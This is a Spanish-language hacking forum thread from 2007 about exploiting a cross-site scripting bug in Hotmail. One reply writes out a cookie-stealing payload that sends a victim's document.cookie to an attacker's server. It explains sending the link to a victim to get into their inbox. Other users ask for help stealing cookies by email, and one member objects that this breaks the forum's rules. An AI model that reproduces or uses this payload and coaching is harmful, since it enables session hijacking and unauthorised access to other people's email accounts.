elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 12:12  


Tema destacado: Entra al canal IRC oficial de #elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Explotando el bug de hotmail Mar 2007
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Explotando el bug de hotmail Mar 2007  (Leído 8,261 veces)
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Explotando el bug de hotmail Mar 2007
« en: 30 Marzo 2007, 21:30 »

Bueno , dando leche a estos temas y aprendiendo un poco mas c/dia, dejo un manual de como explotar la vulnerabilidad del movil.msn, (Aun no parchado), en el lapso de 2 dias cerrao :)

Un paper, muy en general, o como dicen abstracto LOL, no entro en mas detalles por que en verdad esta mas simple que pegarle al chavo del 8(ojo a los que me conocen, sabran que es una chanfaina mis detalles.

Nivel +++

Requerimientos: Firefox(plugin web developer) y no ser hijueputa, por que posteo el paper? por que el conocimiento es de todos. y aparte por que por ahi creooo rey 11, dijo que con XSS no se hace nada!!.... se hace mucho

http://www.akira-do-jo.thelastart.com/bughotmailmar2007.pdf

Saludos!
MITM

Pd: No hagan huevadas que no quieren que les hagan!!, todo es un BOOOMERANG!


En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #1 en: 30 Marzo 2007, 23:02 »

apenas una empresa de seguridad y auditoria de software web, de cuyo nombre no quiero acordarme, mencionó que menos de la mitad de las vulnerabilidades de XSS pueden terminar en comprometer el servidor..

RSnake, como se esperaba salto con tales afirmaciones, y acepto el reto de demostrar lo contrario.. los bugs de XSS, son demasiado peligrosos.. solo que los que saben explotarlos no los usan tanto.. hay otros bugs mas interesantes, y los que no saben, se dedican a robar cookies y guardarlas en un log.

La cantidad de aplicaciones que realmente explotan los bugs de XSS son contados.. fuera del bug de myspace, el de threadferr, y alguna cosa que me enseño Preth00nker, todos los demas son realmente  inofensivos.. ya que como ya mencione, un log con cookies NO LO ES TODO.. de hecho eso es NADA.

Si encontramos un XSS en una aplicacion local (como archivos de soporte), podemos comprometer la victima a tal grado de hacer que pierda control total del ordenador.
Se pueden instalar una de las decenas de xssshells, para funcionar como keyloggers, y controlar la navegacion de un usuario ignorante, entre otras muchas cosas.

para terminar, solo quiero dejarlos con que no crean que un XSS es inofensivo, ya que si lo es, y si piensas lo contrario, esporque no sabes explotarlo.

Saludos!!
En línea

GrTk

Desconectado Desconectado

Mensajes: 185



Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #2 en: 1 Abril 2007, 01:40 »

Disculpen mi ignorante pregunta, pero como hago para conseguir la cookie (a la que quiero entrar)
En línea

Ilorev


Desconectado Desconectado

Mensajes: 473


???


Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #3 en: 1 Abril 2007, 01:54 »

le envias un links a la victima , donde las cookie de tu victima se registren en archivo en tu servidor

www.paginavulnerable.com?xss=<script>document.location="http://www.tuservercom.do/cookie?var="+document.cookie;</script>



lee el manual de Sirdarckcat
http://foro.elhacker.net/index.php/topic,98324.0.html
En línea

EOF
GrTk

Desconectado Desconectado

Mensajes: 185



Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #4 en: 1 Abril 2007, 03:21 »

gracias es lo que necesitaba
En línea

-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #5 en: 1 Abril 2007, 17:01 »

gracias es lo que necesitaba

diría que ya está parchado, no?
En línea
Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #6 en: 2 Abril 2007, 01:20 »

de q trata este bug?no le enteindo
entra a la bandeja de entrada de una victima por medio de los cookies? es eso?
de ser asi ,como averiguo su pass  estando dentro su cuenta?
En línea
Ilorev


Desconectado Desconectado

Mensajes: 473


???


Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #7 en: 2 Abril 2007, 03:22 »

el bug se llama xss ( cross site script ) , en este caso se aprovecha para robar las cookies de la victima , y asi acceder a la bandeja de entrada ... , si lee   un poco mas sobre los xss  , mas  a comprender mejor
En línea

EOF
R-Q-X

Desconectado Desconectado

Mensajes: 43



Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #8 en: 4 Abril 2007, 18:05 »

Disculpen mi ignorancia hace ya un poco de tiempo q estoy con esto.. y no puedo hacer q me llege un mail con la cookie..lo quiero hacer enviandole un mail a la victima con un link y q me mande la cookie...estoy utilizando javascript, php y html.
si necesitan los codes para ayudarme los posteare
salu2
En línea

Que fue lo mas inteligente que salio de la boca de una mujer?
la p*j* de A.Einstein
dimitrix


Desconectado Desconectado

Mensajes: 4.047



Ver Perfil WWW
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #9 en: 4 Abril 2007, 18:36 »

Mi enhorabuena, facil de comprender y de usar (no lo usare, lo prometo)

pero una cosa, esa barrita para modificar la galleta :) (como el icono es de pastelero) que aparece en el FF como la consiguo ¿?
En línea




Azielito
no es
CoAdmin
***
Desconectado Desconectado

Mensajes: 9.114


>.<


Ver Perfil WWW
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #10 en: 4 Abril 2007, 18:52 »

aca
https://addons.mozilla.org/es-ES/firefox/addon/60  > http://chrispederick.com/work/webdeveloper/
En línea

^Winder^


Desconectado Desconectado

Mensajes: 2.768


El mundo no es tuyo, es de todos.


Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #11 en: 4 Abril 2007, 19:32 »

no quiero molestar....   :-\  pero este tema no va contra las normas del foro? veo muy bien avisar para que nadie se fie de ciertas webs y ciertos email con ciertos enlaces peligrosos,pero explicar como hacer la jugarreta aunque al mismo tiempo se diga que no se utilice me parece contradictorio....

no creen?  :-\

PD: ya sé que aun no han borrado este tema,y que eso debe ser por algo...pero lo admito,no entiendo ese "algo"  :huh:

En línea


Yo apoyo la esperanza de Caylees. Frenemos la Leucemia:
www.cayleeshope.com
Libertad conquistada.  (Justicia ;-))
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #12 en: 4 Abril 2007, 19:47 »

Citar
no quiero molestar....     pero este tema no va contra las normas del foro? veo muy bien avisar para que nadie se fie de ciertas webs y ciertos email con ciertos enlaces peligrosos,pero explicar como hacer la jugarreta aunque al mismo tiempo se diga que no se utilice me parece contradictorio....

no creen?   

PD: ya sé que aun no han borrado este tema,y que eso debe ser por algo...pero lo admito,no entiendo ese "algo" 


Sobre ese tema!!!, que te puedo decir, Normas, que normas, se solto la explotacion, para explicar un tema de XSS, ya que casi el 90% del foro (dentro me incluyo), no entienden a un 100 % como explotar  o lo peligroso que puede ser, el solo dar un click a un enlace.

Si usas la tecnica o no ya es cuestion de c/uno. si no se llamaria este subforo de otra forma.

Y para terminar se solto el tema " ", cuando se sabia que Hotmail, ya estaba parchando este bug, en cuestion de horas, lo cualllllll, no quiere decir, que xss no funcione, hay para darle para rato,  :xD,  bueno si no te gusta! te vistes y te vas  LOLLL
En línea
^Winder^


Desconectado Desconectado

Mensajes: 2.768


El mundo no es tuyo, es de todos.


Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #13 en: 4 Abril 2007, 20:07 »

No me mal interpretes,no sabía que el bug había sido parchado,creía que aun no se había parchado y por eso me preocupé por exponer mi duda,esperaba salir de tal duda,en tu caso ya me has sacado de ella diciendome que ya no hay peligro,nada mas 

En línea


Yo apoyo la esperanza de Caylees. Frenemos la Leucemia:
www.cayleeshope.com
Libertad conquistada.  (Justicia ;-))
Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.645



Ver Perfil
Re: Explotando el bug de hotmail Mar 2007
« Respuesta #14 en: 5 Abril 2007, 01:09 »

Naa hombre no hay problema, para eso es un foro, para debatir,  :)

Saluuos
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Explotando XSS desde el Header Referer IE 6,7,8
Hacking Avanzado
Preth00nker 1 1,014 Último mensaje 14 Noviembre 2011, 22:45
por adastra
Tutorial - Explotando aplicaciones con Heap Spraying
Bugs y Exploits
soez 1 526 Último mensaje 10 Marzo 2012, 16:54
por jackgris
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines